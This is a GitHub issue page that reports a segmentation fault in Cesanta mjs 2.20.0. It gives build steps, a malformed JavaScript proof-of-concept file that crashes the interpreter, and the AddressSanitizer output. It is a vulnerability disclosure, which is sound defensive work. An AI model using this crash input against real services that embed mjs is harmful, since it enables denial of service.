Skip to content

SEGV (/mjs/mjs+0x4ec508) #252

Open
Open
@vorfreuder

Description

@vorfreuder

The name of an affected Product
mjs

The affected version
Commit: b1b6eac (Tag: 2.20.0)

Description
An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs+0x4ec508 component.

Vulnerability Type
segmentation violation

Environment

  • Operating System
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.6 LTS
Release:        18.04
Codename:       bionic
  • Compiler
Ubuntu clang version 12.0.1-++20211102090516+fed41342a82f-1~exp1~20211102211019.11
Target: x86_64-pc-linux-gnu
Thread model: posix

Steps to Reproduce

git clone https://github.com/cesanta/mjs
cd mjs
git checkout b1b6eac
clang -fsanitize=address -DMJS_MAIN mjs.c -o mjs
poc
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;

for (i = 8; i < 20; i++) {
  a let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify-= i;
c /= 0, c = 0let s = '08888888888888    true, "x": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""');  // Zlength string
let s2 = JSON.stringify(o)AAA

run command

mjs -f poc

ASAN info

AddressSanitizer:DEADLYSIGNAL
=================================================================
==139==ERROR: AddressSanitizer: SEGV on unknown address 0x0000004ec508 (pc 0x0000004ec508 bp 0x7ffe0c9ce3d0 sp 0x7ffe0c9cdb58 T0)
==139==The signal is caused by a WRITE memory access.
    #0 0x4ec508  (/mjs/mjs+0x4ec508)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/mjs/mjs+0x4ec508) 
==139==ABORTING

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions